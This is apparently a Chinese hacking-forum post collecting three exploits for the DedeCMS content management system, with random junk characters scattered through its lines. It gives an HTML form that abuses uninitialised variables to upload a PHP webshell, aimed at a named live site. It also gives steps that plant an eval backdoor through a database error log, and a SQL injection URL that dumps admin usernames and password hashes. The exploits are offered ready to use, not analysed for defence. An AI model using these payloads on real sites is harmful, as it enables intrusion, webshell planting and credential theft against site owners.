  W, t9 D& x5 F* z  p' R% k
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
5 t+ i/ C+ u: G- l<html>
/ t$ D  v9 _( B+ M- M4 q" t: ?<head>
4 c2 |3 Q/ [6 m8 |9 R<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>  T) |5 K4 ~4 u9 [3 b
</head>
3 W5 h* V5 D  g1 t<body style="FONT-SIZE: 9pt">
! y+ |( L: ?9 S% m( z7 F---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />3 x- _( ]6 W; q/ n' t. ?1 W9 S9 r
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>7 S9 |$ b4 M' G7 |- b
<input type='hidden' name='activepath' value='/data/cache/' />
% y7 o: U( Q& h8 y! U2 @3 f3 y<input type='hidden' name='cfg_basedir' value='../../' />
2 u2 j; f9 W: Q9 Q+ E<input type='hidden' name='cfg_imgtype' value='php' />4 ]: m3 G9 R* T( B, y+ u
<input type='hidden' name='cfg_not_allowall' value='txt' />$ G/ y$ _2 A) D& {% s- ?" w
<input type='hidden' name='cfg_softtype' value='php' />3 h/ Q; t! n4 u3 `3 H3 E: q
<input type='hidden' name='cfg_mediatype' value='php' />& H% P. ^* V# b( n7 q
<input type='hidden' name='f' value='form1.enclosure' />
1 E$ o: i3 o( h  c<input type='hidden' name='job' value='upload' />
2 t/ h3 q7 d% D7 ]; |<input type='hidden' name='newname' value='fly.php' />
% ?% O+ ^1 S) e& f6 d, y( D& BSelect U Shell <input type='file' name='uploadfile' size='25' />
. l. R" S) ]3 {4 T* I<input type='submit' name='sb1' value='确定' />
0 B2 S4 }' R1 z/ i$ w4 D5 N- x0 Z</form>! ]. ^$ M% H* ]% e$ M9 b
<br />It's just a exp for the bug of Dedecms V55...<br />
0 p2 F- p6 w* i+ Y6 v2 m& WNeed register_globals = on...<br />
- X' ~# V7 i% ?- u5 x; K- n4 }+ jFun the game,get a webshell at /data/cache/fly.php...<br />: u( X" A4 g) F; Q
</body>0 O5 ~1 H( P: s0 \7 i
</html>
5 W3 j6 g) f$ i! h
% A7 y" E, S* ]2 ]3 P& _7 _1 C1 W( W. [; ]

: V4 b- d6 B/ X1 r9 }3 P" B$ h, U/ m- C( G( |( J( H% D

/ u4 l0 N$ E/ O" \7 a
4 z# {, F* Q+ D# e
9 D" q' [* W7 ^/ Q+ j" m; ^2 U  g0 N- t' e( k1 g
" Y) f7 |# l" O6 I. ?2 X4 u- e5 R
( l4 E; E( h. l4 v
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞% Y# ?1 A2 y, E6 t
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。! y# E1 C( ~; C" Q, w
1. 访问网址:+ J& G* `. |7 p7 d( e
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>6 q' B) l! \6 \. J/ m* `% O
可看见错误信息! G+ x  m2 x0 h0 B, G' v6 k$ i7 w
- K' [9 u5 V# Q
7 D5 F" ]; v' V9 e
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
$ q+ I" @/ O3 K0 Q* f* K( Iint(3) Error: Illegal double '1024e1024' value found during parsing3 ?: E6 c( T+ y; Q: q+ e
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>8 W$ e* p2 K/ n* C. O) Z3 p
1 u9 K/ d/ _% P5 X* l

9 O& @# S. H: @( \% L: X3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
; Z0 `5 L. G. \# Y$ q1 C3 Y
6 i7 s" V! I7 q8 R; b
% b) D) I" a- p5 }* ^<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
1 k. ]# M1 [* r. c
9 @9 [2 R' j; I3 q" S. T% m- Z+ S! _6 ^( C6 {
按确定后的看到第2步骤的信息表示文件木马上传成功.
8 _- _* R, [2 v
* r) s! V4 `& q# C* K* z3 R' }! O$ k# h, H2 z- i4 F7 M' ?' Y: R+ v4 r

8 C$ @. D  ]+ T% B$ K/ q  q
" ?' F! @% q6 M, k4 f1 |9 ~2 r4 m, N) [) l* c; s
8 B( H  Q6 Z9 J) H3 R3 q

! F3 i( g. S" j$ n
! _! L4 q! _8 A3 O; h8 B0 U' a  K) I- i
; Q6 ^. S+ @% G/ Z2 _4 O& x/ a6 Q

! O9 `5 J$ W5 U7 d. I) c  r
2 y# Q- ]7 ~, x7 @, n# H, v! O织梦(DedeCms)plus/infosearch.php 文件注入漏洞9 C2 f5 a! A; b2 \4 _& U3 d
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2